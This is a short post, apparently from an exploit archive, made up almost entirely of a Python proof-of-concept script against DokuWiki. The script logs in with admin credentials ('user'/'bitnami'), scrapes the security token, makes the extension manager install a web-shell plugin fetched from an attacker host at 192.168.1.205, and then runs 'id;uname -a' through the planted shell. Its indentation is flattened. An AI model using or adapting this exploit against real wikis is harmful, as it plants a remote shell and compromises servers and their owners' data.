This proof of concept code shows how administrative functionality can be abused in DokuWiki to upload a shell.
729d40f68a98bc4c5c3dc2afec215396
c@kali:~/src/napalm2.2/modules$ cat shell-dokuwiki.py
#!/usr/bin/env python
# shell-dokuwiki.py - module to upload shell, based on previous version
# created 28.04.2017. Bug ('feature') is exploitable only
# when you will have a valid credentials.
# for this proof-of-concept you'll also need host with you.r/shell.zip
#
import sys
import re
import requests
print '[+] Module : dokuwiki - started.'
print
target = raw_input("[+] Hostname> ")
logMe = target + '/doku.php?id=start&do=login§ok='
print
session = requests.session()
login_data = dict(u='user', p='bitnami')
req = session.post(logMe, data=login_data)
# 2nd req:
afterPage = target + '/doku.php?id=start&do=admin&page=extension&tab=install'
req2 = session.get(afterPage)
resp = req2.text
if 'Log Out' in resp:
print '[+] We are logged-in as admin. Preparing shell...'
req3 = session.get(afterPage)
resp3 = req3.text
pattern = re.compile('<input type="hidden" name="sectok" value="(.*?)"/>')
found = re.search(pattern, resp3)
if found:
sectok = found.group(1)
print '[+] Found "sectok":' + str( sectok )
print '[+] Preparing shell params to upload'
data_shell = {
'sectok':sectok,
'installurl':'http://192.168.1.205/mishell.zip'
}
reqshell = session.post(afterPage, data=data_shell)
respshell = reqshell.text
md5name = re.compile('<div class="success">Plugin (.*?) installed successfully</div>')
foundmishell = re.search(md5name, respshell)
if foundmishell:
print '[+] Mishell name:' + str( foundmishell.group(1))
shellUrl = target + '/lib/plugins/'+foundmishell.group(1)+'/mishell.php?x=id;uname -a'
verify = session.get(shellUrl)
vtext = verify.text
print ' ',vtext
print ''
print '[+] Your shell should be here:', shellUrl
## can not log in
else:
print '[-] Can not login. Something is wrong :C'
print '[+] Module : dokuwiki - finished.'